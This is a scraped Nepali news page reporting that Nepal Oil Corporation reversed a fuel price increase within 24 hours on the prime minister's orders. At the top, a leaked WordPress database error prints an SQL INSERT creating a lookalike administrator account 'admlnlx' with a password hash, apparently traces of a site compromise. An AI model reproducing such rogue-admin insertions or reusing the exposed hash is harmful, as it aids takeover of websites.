WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BW3.QQFNivS9USN3bk45kpZxM0REYa.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:30:24', '', 'admlnlx', 'admlnlx')

पेट्रोलियम पदार्थमा मूल्यवृद्धिको निर्णय २४ घण्टा नबित्दै फिर्ता – Gaule Khabar

पेट्रोलियम पदार्थमा मूल्यवृद्धिको निर्णय २४ घण्टा नबित्दै फिर्ता

पेट्रोलियम पदार्थमा मूल्यवृद्धिको निर्णय २४ घण्टा नबित्दै फिर्ता

काठमाडौ । नेपाल आयल निगमको पेट्रोलियम पदार्थमा मूल्यवृद्धिको निर्णय चौबीस घण्टा नबित्दै फिर्ता लिएको छ ।
आयल निगमले हिजो राती १२ बजेबाट लागुहुने गरि गरेको मूल्यवृद्धिको निर्णय बिरुद्वमा सामाजिक सञ्जालमा व्यापक बिरोध भएपछि प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’को निर्देशनमा आज राति १२ बजेबाट लागू हुनेगरी पेट्रोलियम पदार्थको मूल्यवृद्धि फिर्ता लिएको हो ।

निगमले पेट्रोलमा २ रुपैयाँ, डिजेलमा र मट्टिटेलमा ६ रुपैया र खाना पकाउने एलपी ग्यासमा प्रतिसिलिन्डर मूल्य २१५ रुपैयाँ मूल्यवृद्धि गरेको थियो ।

‘सम्माननीय प्रधानमन्त्री श्री पुष्पकमल दाहाल ‘प्रचण्ड’ बाट निर्देशन भएबमोजिम स्वचालित मूल्य प्रणाली यथावत् हुने गरी हाल भएको मूल्यबृद्धिलाई मूल्य स्थिरीकरण कोष तथा नेपाल सरकारबाट प्राप्त हुने रकमबाट समायोजन गर्ने गरी मूल्यबृद्धि गर्ने निर्णय आजै राति १२ः०० बजेबाट लागू हुने गरी फिर्ता गरिएको व्यहोरा जानकारी गराइन्छ,’– निगमले जारी गरेको विज्ञप्तिमा भनिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका